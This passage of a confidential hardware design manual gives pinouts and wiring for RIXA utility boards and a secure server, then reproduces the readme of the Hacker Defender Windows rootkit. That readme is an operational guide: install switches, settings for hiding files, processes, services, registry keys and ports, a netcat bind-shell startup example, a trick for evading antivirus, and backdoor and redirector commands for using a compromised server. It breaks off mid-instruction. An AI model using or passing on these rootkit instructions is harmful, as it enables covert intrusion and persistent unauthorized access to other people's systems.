system. Both the main utility board and its satellites are entirely self-contained and maintain
independent operation from the host computer, additionally utility programs are stored in nonvolatile memory and feature a power on reset capability. The Utility board communicates to and
from the host via an RS232 communications protocol. Quite a large number of these boards are used
in the RIXA family of products and therefore they are designed to be both extremely flexible and
economical.
The board features a powerful micro-controller with its own microprocessor, a limited amount of
Random Access Memory (RAM) and a Non-Volatile EEPROM memory for programming at the
factory. Combined with a few additional chips this forms the basis of many of the housekeeping and
sensor management tasks for the Rixa family of products.
The following documentation is intended to serve as a design template for the Rixa engineers, tasked
with the development of the various sub systems. The utility board is NOT to be used for systems
requiring time critical or direct connection to the host PC, for these applications we will be utilizing
the much more powerful Rabbit 3000 processor. Which is capable of direct interfacing to the PCI
bus. The Utility board is ideal for instrumentation applications, Sensor control and watchdog
functions. The utility board features are as follows:
On Board 8 channel latched led array
Buffered & latched 8 Bit Data bus
Up to 4 independent serial communications ports
Three additional Expansion channels
Three Independent Analog to digital converters
Power on and manual reset
38 bytes scratch RAM
Dedicated RS232 serial port
CONFIDENTIAL
Page 98 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Micro-controller specifications
The default micro-controller used in the utility board is the Parallax BS2P, which strikes a nice
three-way balance between speed of execution, (20 Mega-Hertz), EEPROM programming memory
capacity and economy. For specific applications the utility board can be populated with other more
(Or less) powerful micro-controller chips.
CONNECTION SPECIFICATIONS: CN1 (15 pin in line connector on 0.1 inch centers)
When adapted to DB15 connector the same pin numbers are used.
Pin one is located at the center of the board.
PIN#
DESCRIPTION
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Slave board select (0)
Slave board select (1)
Slave board select (2)
Slave board select (3)
Ground
Vcc = 5 Volts
Slave board select (4)
Slave board select (5)
Slave board select (6)
Slave Board select (7)
Expansion channel (P5)
Expansion channel (P6)
Expansion channel (P7)
Vcc = 5 Volts
Ground
CONFIDENTIAL
Page 99 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
PROCESSOR SCHEMATIC DIAGRAM
CONFIDENTIAL
Page 100 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
PRINTED CIRCUIT BOARD DESIGN (MASTER UTILITY BOARD)
Software functionality:
(TYPICAL SATELLITE BOARD – design reference
Schematic V1.0
The basic software is generic in nature
acting as middleware between the host
CPU and various hardware components.
The software initializes attached
peripherals and then polls the RS232 host
computer interface. The host CPU can
instruct the Utility Board to turn on or off
any combination of output bits. Specialized
versions of the software utilizing the same
Utility Board hardware enhance this
functionality with the addition of analog
and digital sensors which can be responded
to by the Utility Board processor with out
the intervention if the host CPU. A
software library has been developed to
provide consistent low-level functions for
all variants of the boards application
software. Thus we can reduce development
time for a subsystem. (Less than a day in
most cases.) The consistent low-level
software library also gives us the ability to
construct ultra reliable complex systems
consisting of modular self-contained subsystems.
Printed Circuit board for
satellite circuit. Ten pin
connectors allow for a pass
through of the 8 bit data
buss and the 8-channel
board select lines. The 20pin jumper block allows for
the address of the board to
be set. Besides the jumpers
selecting boards 1-8 there
are two additional positions
designated disable and buss
monitor mode. The board
illustrated is a LED monitor
board, other variants
include: mechanical, or
solid-state relay, CPU driver
etc.
CONFIDENTIAL
Page 101 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
SOFTWARE DEVELOPMENT CONSIDERATIONS: (Design reference – only)
Initialization
The system should take care to perform an initialization on reset or power up. The system will
reset when:



The reset button is pressed.
The power is withdrawn and re- connected.
The system detects a drop in Vcc from a nominal 6 Volts to 4 Volts or less.
General Initialization sequence:
Goal. Set all outputs to fail safe defaults upon initialization. All outputs are high of power on
even so initialization procedure sets all bits to known values.
Pin 3 (Latch Enable 259) High = Hold
Pin 4 (Data Latch Enable 373) High = No Satellite latch
0 = Weighted value 1
1 = Weighted value 2
2 = Weighted value 4
For each address of satellite boards attached set pins 0-2
e.g. Board 6 = pins 1 and two (2 +4) = 6
Send LE-259 Low for 10 milliseconds (Pin 3) Data bit is now latched address lines stable.
Place desired default data on 8 bit bus Set Data bit (Pin4) to Low
Set LE (Pin3) to Low to lock satellite data in Set data bit (Pin 4) low to fix lock
Set LE (Pin3) to High Set LE (Pin3) to Low Set LE (Pin3) to High
Repeat for all satellite boards connected.
CONNECTOR PIN OUTS FOR CN3 DB9 pin D sub-miniature
PIN#
Utility board function
PC function
1
No Connection
2
SOUT
Rx
3
SIN
Tx
4
ATN
DTR (Isolated via 0.1 uF capacitor)
5
Ground
Signal Ground
6
LOOPBACK
DSR
7
LOOPBACK
RTS
8
No Connection
9
No Connection
NOTES:
To simplify the printed circuit board wiring and reduce the overall board size the on board
outputs are wired as follows: 1, 2, 3, 4, 8, 7, 6, 5
CONFIDENTIAL
Page 102 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
CONNECTIONS : Main bus bit 1 CN2 (9 pin in line connector 0.1 inch centers)
PIN#
DESCRIPTION
PIN# DESCRIPTION
1
Ground
2
3
Main bus bit 7
4
5
Main bus bit 5
6
7
Main bus bit 3
9
9
Main bus bit 1
Pin one is located at the edge of the board (Revision 0)
Processor pins and functions
PIN#
PIN NAME
1
SOUT
2
SIN
3
ATN
4
Vcc
5
P0
6
P1
7
P2
8
P3
9
P4
10
P5
11
P6
12
P7
13
P8
14
P9
15
P10
16
P11
17
P12
18
P13
19
P14
20
P15
21
Ground
22
Reset
23
Vcc
24
VIN 6 – 12 Volts DC
Main bus bit 8
Main bus bit 6
Main bus bit 4
Main bus bit 2
FUNCTION
DB9(2) Rx
Serial Send
DB9(3) Tx
Serial Receive
DB9(4) DTR
Attention
5 Volts DC regulated
Satellite board address bit (0)
Satellite board address bit (1)
Satellite board address bit (3)
Latch enable for board address (Active low)
Data line routed to addressed board
Expansion bit (0)
Expansion bit (1)
Expansion bit (2)
Data bus bit (0)
Data bus bit (2)
Data bus bit (3)
Data bus bit (4)
Data bus bit (5)
Data bus bit (6)
Data bus bit (7)
Data bus bit (8)
Ground
Reset
5 Volts regulated
Alternate unregulated supply voltage
AUXILLIRY CONTROL SUBSYSTEM CONTROL PANEL PIN-OUTS MOLEX 20 PIN CONNECTOR
2
1
WIRE#
1
2
3
4
5
6
7
8
9
10
15
4
6
8
3 5
7
10 12 14 16 18 20
9
11 13 15 17 19
AS SEEN FROM MALE CONNECTOR
ON CONTROL MODULE
CONNECTION
WIRE#
CONNECTION
LIGHT 8
11
12
13
14
15
16
17
18
19
LIGHT 4
LIGHT 4
LIGHT 7
LIGHT 6
LIGHT 5
`
LIGHT 3
PLUS 12 Volts Regulated
Ground
LIGHT 1
CONFIDENTIAL
Page 103 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa “STEEL” SECURE SERVER Design Reference only
The Following information is specific for the Intel 850GB mother board. Consult the master
connection diagrams for specific motherboard connect points.
HARDWARE DOCUMENTATION MAIN BOARD SENSOR CONNECTOR #1
PIN
1
21
2
22
3
23
4
24
5
25
6
26
7
27
8
28
9
29
10
30
11
31
12
32
13
33
14
34
15
35
16
36
17
37
18
38
19
39
20
40
FUNCTION
LED RJ45 Green pin x
LED RJ45 Green pin x
LED RJ45 Yellow pin x
LED RJ45 Yellow pin x
REAR INTRUDER pin 2
REAR INTRUDER pin 1
LED DIAGNOSTIC pin 8
LED DIAGNOSTIC pin 7
LED DIAGNOSTIC pin 6
LED DIAGNOSTIC pin 5
LED DIAGNOSTIC pin 4
LED DIAGNOSTIC pin 3
LED DIAGNOSTIC pin 2
LED DIAGNOSTIC pin 1
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
PARALLEL
NO CONNECTION
LOCATION
WIRE
CONNECT
H1
H1
H1
H1
E1
E1
H1
H1
H1
H1
H1
H1
H1
H1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
J-K1
Yell
Whi
Yell
Whi
Yell
Whi
Yell
Whi
Yell
Whi
Yell
Whi
Yell
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
Whi
1 244 U1 pin
4
244 U1 pin
5
6
24
7
8
22
9
10
20
11
12
18
13
17
14
16
CONFIDENTIAL
Page 104 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Rixa “STEEL” SECURE SERVER
HARDWARE DOCUMENTATION MAIN BOARD SENSOR CONNECTOR #2
PIN
1
21
2
22
3
23
4
24
5
25
6
26
7
27
8
28
9
29
10
30
11
31
12
32
13
33
14
34
15
35
16
36
17
37
18
38
19
39
20
40
FUNCTION
LED STANDBY POWER
LED STANDBY POWER
BIOS CONFIG pin3
BIOS CONFIG pin2
BIOS CONFIG pin1
WOR pin1
WOR pin2
PWR/SLP pin3
PWR/SLP pin1
SMB pin1
SMB pin2
SMB pin3
CONFIG BIOS
CONFIG BIOS
CONFIG BIOS
PC/PCI pin1
PC/PCI pin5
PC/PCI pin6
PC/PCI pin4
PC/PCI pin2
FNT-USB pin3
FNT-USB pin1
FNT-USB pin7
FNT-USB pin5
FNT-USB pin8
FNT-USB pin9
FNT-USB pin4
FNT-USB pin6
USB/CNB pin1
FNT-USB pin2
USB/CNB pin3
USB/CNB pin2
USB/CNB pin5
USB/CNB pin6
CLR/CM pin3
USB/CNB pin4
CLR/CM pin2
CLR/CM pin1
BATTERY- NEGATIVE
BATTERY +POSITIVE
LOCATION
WIRE
6F
6F
8C
8C
8c
C1
C1
C3
C3
C8
C8
C8
C8 (J8C2)
C8 (J8C2)
C8 (J8C2)
6D
6D
6D
6D
6D
C10
C10
C10
C10
C10
C10
C10
C10
D8 (J8D1)
C10
D8 (J8D1)
D8 (J8D1)
D8 (J8D1)
D8 (J8D1)
D9 (J8D2)
D8 (J8D1)
D9 (J8D2)
D9 (J8D2)
A9
A9
Red
Blue
Yell
Blue
White
White
Blue
Blue
Yellow
Blue
Yellow
White
Yellow
Red
White
Red
White
Gray
Blue
Green
Red
White
Yellow
Blue
Green
White
Blue
Purple
White
Gray
Green
Red
Blue
Purple
Yellow
Yellow
Red
White
White
Red
CONNECT
6
CONFIDENTIAL
Page 105 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
DB 25 CONNECTOR
Parallel PIN-OUTS
AS SEEN FROM FEMALE CONNECTOR AT REAR OF CPU
1
2
3
4
5
6
7
8
9 10 11 12 13
14 15 16 17 18 19 20 21 22 23 24 25
PIN#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
NAME
STROBE#
D0
D1
D2
D3
D4
D5
D6
D7
ACK#
BUSY#
OUT-OF-PAPER
SELECT
AUTOFEED#
ERROR#
INIT-PRINT#
SELECT-IN#
GND
GND
GND
GND
GND
GND
GND
GND
IN-OUT
OUT
OUT
OUT
OUT
OUT
OUT
OUT
OUT
OUT
IN
IN
IN
IN
OUT
IN
OUT
OUT
DESCRIPTION OF SIGNAL
ACTIVE LOW INTICATED CHAR IS SENT
DATA BIT 0
DATA BIT 1
DATA BIT 2
DATA BIT 3
DATA BIT 4
DATA BIT 5
DATA BIT 6
DATA BIT 7
ACTIVE LOW RECEIVED LAST CHAR
PRINTER CANNOT ACCEPT INPUT
OUT OF PAPER
PRINTER ON LINE & CONNECTED
ACTIVE LOW INSERT LINE FEED+CR
ACTIVE LOW ERROR HAS OCCURRED
RESETS PRINTER
TELLS PRINTER IT IS SELECTED
DRIVE SELECTOR SWITCH WIRING DIAGRAM, 3 Position, 4 Pole, non-shorting, rotary.
POLE NUMBER
COMMON
POS I
POS II
POS III
1
2
3
4
CHANNEL ONE
CHANNEL TWO
CHANNEL THREE
POS
POS
NEG
NEG
LED1
NEG
POS
NEG
LED2
NEG
NEG
POS
LED3
The tri-state IDE buffers are enabled/disabled by the common lines of the first three channels, which act as a
data selector selecting either plus five or ground providing a one of three positive data selector (active high).
The other two lines being tied low. The fourth pole is used to route an active high, three-channel data
distributor to the three bi-colored LEDs on the front panel.
1
2
3
4
orange
yellow
gray
dark blue
red
white
white
lt.blue
white
red
white
green
white
white
red
purple
CONFIDENTIAL
Page 106 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
TRI-STATE BUFFER UTILIZATION (U1)
“U1” DM- 54LS244 NON INVERTING OCTAL TRISTATE BUFFER MILITARY : (MILSPEC)
PIN#
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
DESCRIPTION
GROUND OUTPUT ENABLE CHANNEL 0-3
0 IN
4 OUT
1 IN
5 OUT
2 IN
6 OUT
3 IN
7 OUT
GROUND
7 IN
3 OUT
6 IN
2 OUT
5 IN
1 OUT
4 IN
0 OUT
GROUND OUTPUT ENABLE CHANNEL 4-7
ROUTING
NOTE
VCC
STROBE LIGHT CABLE DEFINITION 4 PIN MOLEX CONNECTOR AS SEEN FROM REAR OF UNIT
1
RED WIRE PLUS 5 VOLTS
2
NO CONNECTIUON
3
*YELLOW WIRE INT, WHITE EXT SIGNAL +5 Volts = DISABLE STROBE
4
GROUND WHITE WIRE INT BLACK WIRE EXT
*SIGNAL IS TTL COMPATIBLE VIA 1.8K RESISTOR TO BASE OF INTERNAL NPN TRANSISTOR – 2N2222
UPS LED STATUS EXTERNAL READOUT CABLE DEFINITION
1
2
3
4
5
DRAIN
LED
LED
LED
LED
LED
GROUND
CONFIDENTIAL
Page 107 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
FRONT PANEL 40 PIN MULTIPLEX CONTROL & DIAGNOSTIC CABLE
NUMBERED SEQUENTIALLY ACROSS CABLE FROM PIN ONE
CON: INDICATION:
LOCATION:
FUNCTION:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
LED GREEN
LED GREEN
LED RED
LED YELLOW SCROLL
LED YELLOW CAPS-LOCK
LED YELLOW NUM-LOCK
LED COMMON EXCEPT FOR STATUS
SWITCH
LEARN
SWITCH
LEARN
GROUND
GROUND
LED RJ45 Green pin x H1
LED RJ45 Green pin x H1
LED RJ45 Yellow pin x H1
LED RJ45 Yellow pin x H1
REAR INTRUDER pin 2 E1
REAR INTRUDER pin 1 E1
LED DIAGNOSTIC pin 8 H1
LED DIAGNOSTIC pin 7 H1
LED DIAGNOSTIC pin 6 H1
LED DIAGNOSTIC pin 5 H1
LED DIAGNOSTIC pin 4 H1
LED DIAGNOSTIC pin 3 H1
LED DIAGNOSTIC pin 2 H1
DIAGNOSTIC pin 1
H1
STATUS
STATUS
CONFLICT
CATHODE
CATHODE
CATHODE
ANODE
N/O
N/O
GROUND
WIRE COLOR:
ANODE
YELLOW
CATHODE
YELLOW
CATHODE
GREEN
GRAY
ORANGE
GREEN
RED
BLUE
BLUE
WHITE
Yell
1 244 U1 pin
Whi
4
Yell
244 U1 pin
Whi
5
Yell
Whi
6
Yell
24
Whi
7
Yell
Whi
8
Yell
22
Whi
9
Yell
LED
Whi
10
WIRELESS ROMOTE KEYBOARD AND MOUSE EXTERNAL READOUT DEFINITION DB15
CONNECTOR, FEMALE AS SEEN FROM CIRCUIT BOARD EXTERNAL CONNECTOR.
8
7
6
5
4
3
15 14 13 12 11 10
2
1
9
CONNECTION:
INDICATION:
FUNCTION:
WIRE COLOR:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
STATUS
STATUS
CONFLICT
SCROLL
CAPS-LOCK
NUM-LOCK
EXCEPT FOR STATUS
LEARN
LEARN
ANODE
CATHODE
CATHODE
CATHODE
CATHODE
CATHODE
ANODE
N/O
N/O
DRAIN
GROUND
BLACK/WHITE
RED/WHITE
GREEN/WHITE
BLUE/WHITE
WHITE/BLACK
RED/BLACK
ORANGE/BLACK
GREEN/BLACK
BLUE/BLACK
BLACK
WHITE
RED
ORANGE
GREEN
BLUE
LED GREEN
LED GREEN
LED RED
LED YELLOW
LED YELLOW
LED YELLOW
LED COMMON
SWITCH
SWITCH
ENABLE
ENABLE
ENABLE
ENABLE
ENABLE
GROUND
CONFIDENTIAL
Page 108 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
REFERENCE SECTION TECHNICAL NOTES
Trojan “Read me” Files Reference
The following files are actual Read Me files from Trojan Suite software.
Though full of technical jargon these files tell their own story.
Hacker defender
Authors:
Holy_Father Version:
0.8.4 Birthday:
20.10.2003
Hacker defender (hxdef) is rootkit for Windows NT 4.0, Windows 2000 and Windows XP, it may also work on latest NT based
systems. Main code is written in Delphi 6. New functions are written in assembler. Driver code is written in C. Backdoor and redirector
clients are coded mostly in Delphi 6.program uses adapted LDE32 LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000
Z0MBiE special edition for REVERT tool version 1.05 program uses Superfast/Supertiny Compression/Encryption library
Superfast/Supertiny Compression/Encryption library. (c) 1998 by Jacky Qwerty/29A.
The main idea of this program is to rewrite few memory segments in all running processes. Rewriting of some basic modules cause
changes in processes behavior. Rewriting must not affect the stability of the system or running processes. Program must be
absolutely hidden for all others. Now the user is able to hide files, processes, system services, system drivers, registry keys and
values, open ports, cheat with free disk space. Program also masks its changes in memory and hides handles of hidden processes.
Program installs hidden backdoors, register as hidden system service and installs hidden system driver. The technology of backdoor
allowed to do the implantation of redirector.
Till version 1.0.0 hxdef is freeware. It can be spread but not changed and all copies must includes all files (including original readme
files). The only exception is when target person (and computer owner) wouldn't know about the copy. This project will be open source
in version 1.0.0. And of course authors are not responsible for what you're doing with Hacker defender.
Usage of hxdef is quite simple:
>hxdef084.exe [inifile]
or
>hxdef084.exe [switch]
Default name for inifile is EXENAME.ini where EXENAME is the name of executable of main program without extension. This is used
if you run hxdef without specifying the inifile or if you run it with switch (so default inifile is hxdef084.ini).
These switches are available:
-:installonly
-:refresh
-:noservice
-:uninstall
-
Example:
only install service, but not run
use to update settings from inifile
doesn't install services and run normally
removes hxdef from the memory and kills all
running backdoor connections
stopping hxdef service does the same now
>hxdef084.exe -:refresh
Hxdef with its default inifile is ready to run without any change in inifile. But it's highly recommended to create your own settings. See
Inifile section for more information about inifile.
Switches -:refresh and -:uninstall can be called only from original exefile. This mean you have to know the name and path of running
hxdef exefile to change settings or to uninstall it.
Inifile must contain nine parts: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Hidden RegValues], [Startup
Run], [Free Space], [Hidden Ports] and [Settings]. In [Hidden Table], [Root Processes], [Hidden Services] a [Hidden RegValues] can
be used character * as the wildcard in place of strings end.
Asterisk can be used only on strings end, everything after first asterisks is ignored. All spaces before first and after last another string
characters are ignored.
CONFIDENTIAL
Page 109 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
Example:
[Hidden Table]
hxdef*
This will hide all files, dirs and processes which name start with "hxdef".
Hidden Table is a list of files, directories and processes which should be hidden. All files and directories in this list will disappear from
file managers. Programs in this list will be hidden in tasklist. Make sure main file, inifile, your backdoor file and driver file are
mentioned in this list.
Root Processes is a list of programs which will be immune against infection. You can see hidden files, directories and programs only
with these root programs. So, root processes are for rootkit admins. To be mentioned in Root Processes doesn't mean you're hidden.
It is possible to have root process which is not hidden and vice versa.
Hidden Services is a list of service and driver names which will be hidden in the database of installed services and drivers. Service
name for the main rootkit program is HackerDefender084 as default, driver name for the main rootkit driver is HackerDefenderDrv084.
Both can be changed in the inifile.
Hidden RegKeys is a list of registry keys which will be hidden. Rootkit has four keys in registry: HackerDefender084,
LEGACY_HACKERDEFENDER084,
HackerDefenderDrv084, LEGACY_HACKERDEFENDERDRV084 as default. If you rename service name or driver name you should
also change this list.
First two registry keys for service and driver are the same as its
name. Next two are LEGACY_NAME. For example if you change your service name to BoomThisIsMySvc your registry entry will be
LEGACY_BOOMTHISISMYSVC.
Hidden RegValues is a list of registry values which will be hidden.
Startup Run is a list of programs which rootkit run after its startup.These programs will have same rights as rootkit. Program name is
divided from its arguments with question tag. Do not use " characters. Programs will terminate after user logon. Use common and well
known methods for starting programs after user logon. You can use following shortcuts here:
%cmd%
- stands for system shell executable + path
(e.g. C:\winnt\system32\cmd.exe)
%cmddir%
- stands for system shell executable directory
(e.g. C:\winnt\system32\)
%sysdir%- stands for system directory
(e.g. C:\winnt\system32\)
%windir%- stands for Windows directory
(e.g. C:\winnt\)
%tmpdir%
- stands for temporary directory
(e.g. C:\winnt\temp\)
Example:
1) [Startup Run]
c:\sys\nc.exe?-L -p 100 -t -e cmd.exe
netcat-shell is run after rootkit startup and listens on port 100
2) [Startup Run]
%cmd%?/c echo Rootkit started at %TIME%>> %tmpdir%starttime.txt
this will put a time stamp to temporary_directory\starttime.txt
(e.g. C:\winnt\temp\starttime.txt) every time rootkit starts
(%TIME% works only with Windows 2000 and higher)
Free Space is a list of hard drives and a number of bytes you want to add to a free space. The list item format is X:NUM where X
stands for the drive letter and NUM is the number of bytes that will be added to its number of free bytes.
Example:
CONFIDENTIAL
Page 110 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
[Free Space]
C:123456789
this will add about 123 MB more to shown free disk space of disk C
Hidden Ports is a list of open ports that you want to hide from applications like OpPorts, FPort, Active Ports, Tcp View etc. It has at
most 2 lines. First line format is TCP:tppport1,tcpport2,tcpport3 ..., second line format is UDP:udpport1,udpport2,udpport3 ...
Example:
1) [Hidden Ports]
TCP:8080,456
this will hide two ports: 8080/TCP and 456/TCP
2) [Hidden Ports]
TCP:8001
UDP:12345
this will hide two ports: 8001/TCP and 12345/UDP
3)[Hidden Ports]
TCP:
UDP:53,54,55,56,800
this will hide five ports: 53/UDP, 54/UDP, 55/UDP, 56/UDP and 800/UDP
Settings contains eight values: Password, BackdoorShell, FileMappingName, ServiceName, ServiceDisplayName,
ServiceDescription, DriverName and DriverFileName.
Password which is 16 character string used when working with backdoor or redirector. Password can be shorter, rest is filled with
spaces.
BackdoorShell is name for file copy of the system shell which is created by backdoor in temporary directory.
FileMappingName is the name of shared memory where the settings for hooked processes are stored.
ServiceName is the name of rootkit service.
ServiceDisplayName is display name for rootkit service.
ServiceDescription is description for rootkit service.
DriverName is the name for hxdef driver.
DriverFileName is the name for hxdef driver file.
Example:
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefá$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=HackerDefender084
ServiceDisplayName=HXD Service 084
ServiceDescription=powerful NT rootkit
DriverName=HackerDefenderDrv084
DriverFileName=hxdefdrv.sys
This means your backdoor password is "hxdef-rulez", backdoor will copy system shell file (usually cmd.exe) to "hxdefá$.exe" to temp.
Name of shared memory will be "_.-=[Hacker Defender]=-._". Name of a service is "HackerDefender084", its display name is "HXD
Service 084", its description is "poweful NT rootkit". Name of a driver is "HackerDefenderDrv084". Driver will be stored in a file called
"hxdefdrv.sys".
Extra characters |, <, >, :, \, / and " are ignored on all lines except [Startup Run], [Free Space] and [Hidden Ports] items and values in
[Settings] after first = character. Using extra characters you can make your inifile immune from antivirus systems.
Example:
[H<<<idden T>>a/"ble]
>h"xdef"*
CONFIDENTIAL
Page 111 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
is the same as
[Hidden Table]
hxdef*
see hxdef084.ini and hxdef084.2.ini for more examples
All strings in inifile except those in Settings and Startup Run are case insensitive.
Rootkit hooks some API functions connected with receiving packets from the net. If incoming data equals to 256 bits long key,
password and service are verified, the copy of a shell is created in a temp, its instance is created and next incoming data are
redirected to this shell.
Because rootkit hooks all process in the system all TCP ports on all servers will be backdoors. For example, if the target has port
80/TCP open for HTTP, then this port will also be available as a backdoor. Exception here is for ports opened by System process
which is not hooked. This backdoor will work only on servers where incoming buffer is larger or equal to 256 bits. But this feature is on
almost all standard servers like Apache, IIS, Oracle.
Backdoor is hidden because its packets go through common servers on the system. So, you are not able to find it with classic port
scanner and this backdoor can easily go through firewall. Exception in this are classic proxies which are protocol oriented for e.g. FTP
or HTTP. During tests on IIS services was found that HTTP server does not log any of this connection, FTP and SMTP servers log
only disconnection at the end. So, if you run hxdef on server with IIS web server, the HTTP port is probably the best port for backdoor
connection on this machine.
You have to use special client if want to connect to the backdoor.
Program bdcli084.exe is used for this.
Usage: bdcli084.exe host port password
Example:
>bdcli084.exe www.windowsserver.com 80 hxdef-rulez
this will connect to the backdoor if you rooted www.windowsserver.com before and left default hxdef password
Client for version 0.8.4 is not compatible with servers in older version.
Redirector is based on backdoor technology. First connection packets are same as in backdoor connection. That mean you use same
ports as for backdoor. Next packets are special packets for redirector only. These packets are made by redirectors base which is run
on users computer. First packet of redirected connection defines target server and port.
The redirectors base saves its settings into its inifile which name depends on base exefile name (so default is rdrbs084.ini). If this file
doesn't exist when base is run, it is created automatically. It is better not to modify this inifile externally. All settings can be changed
from base console.
If we want to use redirector on server where rootkit is installed, we have to run redirectors base on localhost before. Then in base
console we have to create mapped port routed to server with hxdef. Finally we can connect
on localhost base on chosen port and transfering data. Redirected data are coded with rootkit password. In this version connection
speed is limited with about 256 kBps. Redirector is not determined to be used for hispeed connections
in this version. Redirector is also limited with system where rootkit run. Redirector works with TCP protocol only. In this version the
base is controlled with 19 commands. These are not case sensitive. Their function is described in HELP command. During the base
startup are executed commands in startup-list. Startup-list commands are edited with commands which start with SU.
Redirector differentiate between two connection types (HTTP and other). If connection is other type packets are not changed. If it is
HTTP type Host parameter in HTTP header is changed to the target server. Maximum redirectors
count on one base is 1000. Redirector base fully works only on NT boxes. Only on NT program has tray icon and you can hide
console with HIDE command. Only on NT base can be run in silent mode where it has no output, no icon and it does only commands
in startup-list.
Examples:
1) getting mapped port info
CONFIDENTIAL
Page 112 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
>MPINFO
No mapped ports in the list.
2) add command MPINFO to startup-list and get startup-list commands:
>SUADD MPINFO
>sulist
0) MPINFO
3) using of HELP command:
>HELP
Type HELP COMMAND for command details.
Valid commands are:
HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL,
DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST
>HELP ADD
Create mapped port. You have to specify domain when using HTTP type.
usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
SERVER PORT> <PASSWORD> [TYPE] [DOMAIN]
>HELP EXIT
Kill this application. Use DIS flag to discard unsaved data.
usage: EXIT [DIS]
4) add mapped port, we want to listen on localhost on port 100, rootkit is installed on server 200.100.2.36 on port 80, target server is
www.google.com on port 80, rootkits password is bIgpWd, connection type is HTTP, ip address of target server (www.google.com) we always have to know its ip - is 216.239.53.100:
>ADD 100 200.100.2.36 80 216.239.53.100 80 bIgpWd HTTP www.google.com
command ADD can be run without parameters, in this case we are asked for every parameter separately
5) now we can check mapped ports again with MPINFO:
>MPINFO
There are 1 mapped ports in the list. Currently 0 of them open.
6) enumeration of mapped port list:
>LIST
000) :100:200.100.2.36:80:216.239.53.100:80:bIgpWd:HTTP
7) datailed description of one mapped port:
>DETAIL 0
Listening on port: 100
Mapping server address: 200.100.2.36
Mapping server port: 80
Target server address: 216.239.53.100
Target server port: 80
Password: bIgpWd
Port type: HTTP
Domain name for HTTP Host: www.google.com
Current state: CLOSED
8) we can test whether the rootkit is installed with out password on mapping
server 200.100.2.36 (but this is not needed if we are sure about it):
>TEST 0
Testing 0) 200.100.2.36:80:bIgpWd - OK
if test failed it returns
Testing 0) 200.100.2.36:80:bIgpWd - FAILED
CONFIDENTIAL
Page 113 of 125
3/8/2016
© LoudWolf Holdings Ltd., LoudWolf Ltd. Edison Laboratories, Digital Animation Inc. All Rights Reserved 2002 - 2003.
__________________________________________________________________________________________________
9) port is still closed and before we can use it, we have to open it with OPEN command, we can close port with CLOSE command
when it is open, we can use flag ALL when want to apply these commands on all ports in the list, current state
after required action is written after a while:
